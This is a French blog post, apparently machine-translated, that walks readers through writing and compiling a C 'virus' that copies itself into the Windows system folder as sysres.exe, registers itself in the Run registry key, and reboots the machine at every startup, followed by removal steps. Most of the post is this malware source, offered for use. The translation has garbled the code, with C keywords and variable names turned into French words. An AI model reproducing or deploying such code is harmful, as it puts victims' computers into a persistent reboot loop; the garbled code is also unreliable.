Je suppose que tous ceux qui utilisent un ordinateur pourraient avoir rencontré le virus du terme, mais avez-vous déjà interrogé sur la création d'un?
Dans ce post , je vais vous dire comment créer un virus informatique en C qui redémarre au démarrage
Vous avez besoin de compiler le code donné dans le compilateur C et à faire le vôtre.
Code source en C ::::::
# Include
# Include <dos.h>
# Include <dir.h>
int trouve, drive_no; buff char [128];
findroot void ()
{
int fait;
struct ffblk ffblk; structure du bloc / / Fichier
done = FindFirst ("C: \ \ windows \ \ system", & ffblk, FA_DIREC); / / pour déterminer la racine du lecteur
if (fait == 0)
{
done = FindFirst ("C: \ \ windows \ \ system \ \ sysres.exe", & ffblk, 0); / / afin de déterminer si le virus est déjà installé ou non
if (fait == 0)
{
trouve = 1; / / signifie que le système est déjà infecté
retour;
}
drive_no = 1;
retour;
}
done = FindFirst ("D: \ \ windows \ \ system", & ffblk, FA_DIREC);
if (fait == 0)
{
done = FindFirst ("D: \ \ windows \ \ system \ \ sysres.exe", & ffblk, 0);
si
(Fait == 0)
{
trouve = 1; retour;
}
drive_no = 2;
retour;
}
done = FindFirst ("E: \ \ windows \ \ system", & ffblk, FA_DIREC);
if (fait == 0)
{
done = FindFirst ("E: \ \ windows \ \ system \ \ sysres.exe", & ffblk, 0);
if (fait == 0)
{
trouve = 1;
retour;
}
drive_no = 3;
retour;
}
done = FindFirst ("F: \ \ windows \ \ system", & ffblk, FA_DIREC);
if (fait == 0)
{
done = FindFirst ("F: \ \ windows \ \ system \ \ sysres.exe", & ffblk, 0);
if (fait == 0)
{
trouve = 1;
retour;
}
drive_no = 4;
retour;
}
d'autre
exit (0);
}
void main ()
{
Auto * FILE, cible *;
findroot ();
if (trouve == 0) / / si le système n'est pas déjà infecté
{
auto = fopen (_argv [0], "rb"); / / Le fichier virus s'ouvrir
switch (drive_no)
{
Cas 1:
target = fopen ("C: \ \ windows \ \ system \ \ sysres.exe", "wb"); / / pour placer une copie de lui-même dans un endroit éloigné
system ("REG ADD HKEY_CURRENT_USER \ \ Software \ \ Microsoft \ \ Windows \ \
CurrentVersion \ \ Run \ / v SRES \ / t REG_SZ \ / j
C: \ \ windows \ \ system \ \ sysres.exe "); / / mettez ce fichier de registre pour Starup
break;
case 2:
target = fopen ("D: \ \ windows \ \ system \ \ sysres.exe", "wb");
system ("REG ADD HKEY_CURRENT_USER \ \ Software \ \ Microsoft \ \ Windows \ \
CurrentVersion \ \ Run \ / v SRES \ / t REG_SZ \ / j
D: \ \ windows \ \ system \ \ sysres.exe ");
break;
case 3:
target = fopen ("E: \ \ windows \ \ system \ \ sysres.exe", "wb");
system ("REG ADD HKEY_CURRENT_USER \ \ Software \ \ Microsoft \ \ Windows \ \
CurrentVersion \ \ Run \ / v SRES \ / t REG_SZ \ / j
E: \ \ windows \ \ system \ \ sysres.exe ");
break;
case 4:
target = fopen ("F: \ \ windows \ \ system \ \ sysres.exe", "wb");
system ("REG ADD HKEY_CURRENT_USER \ \ Software \ \ Microsoft \ \ Windows \ \
CurrentVersion \ \ Run \ / v SRES \ / t REG_SZ \ / j
F: \ \ windows \ \ system \ \ sysres.exe ");
break;
par défaut:
exit (0);
}
while (fread (chamois, 1,1, auto)> 0)
fwrite (chamois, 1,1, cible);
fcloseall ();
}
d'autre
system ("shutdown-r-t 0?); / / si le système est déjà infecté alors juste donner une commande pour redémarrer
}
__________________________________________________________________
Compilation du code exécutable dans le virus de Scource.
1. Téléchargez le code source ici
2. Le fichier téléchargé sera Sysres.C
3. Pour le guide de compilation, étape par étape, consultez mon message Comment compiler des programmes C .
Tests et supprimer le virus de votre PC
Vous pouvez compiler et tester ce virus sur votre propre PC, sans aucune crainte. Pour tester, juste DoubleClick le fichier sysres.exe et redémarrez le système manuellement. Désormais, quand chaque fois que le PC est démarré et le bureau est chargé, votre PC va redémarrer automatiquement, encore et encore.
Il ne fera aucun dommage à part automatiquement redémarrer votre système. Après l'avoir testé, vous pouvez supprimer le virus par les étapes suivantes.
1. Redémarrez votre ordinateur en mode sans échec
2. Aller
X: \ Windows \ System
(X peut être C, D, E ou F)
3.Vous trouverez un fichier en sysres.exe nom, le supprimer.
4.Tapez regedit dans exécuter. Vous goto Registre editor.Here naviguer
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run
Là, sur le bon site, vous verrez une entrée par nom "SRES". Supprimer cette entry.That s 'it.You avez supprimé ce virus avec succès.
La logique derrière travail du virus
Si je n'explique pas la logique (algorithme) derrière le travail du virus, ce poste sera incomplète. Alors je vais vous expliquer la logique d'une manière simplifiée. Ici, je vais pas expliquer les détails techniques du programme. Si vous avez encore des doutes s'il vous plaît commentaires passer.
LOGIQUE:
1. D'abord le virus se trouve la partition racine (partition sur laquelle Windows est installé).
2. Ensuite, il déterminera si le fichier est déjà copié le virus (qui sont déjà infectés) dans X: \ Windows \ System
3. Si ce n'est pas cela il suffit de placer une copie de lui-même dans X: \ Windows \ System et fait une entrée de registre pour mettre ce fichier sur le virus de démarrage.
4. Ou bien si le virus se trouve déjà dans le répertoire X: \ Windows \ System (dossier), puis il donne juste une commande pour redémarrer l'ordinateur.
Ce processus est répété chaque fois que l'ordinateur est redémarré.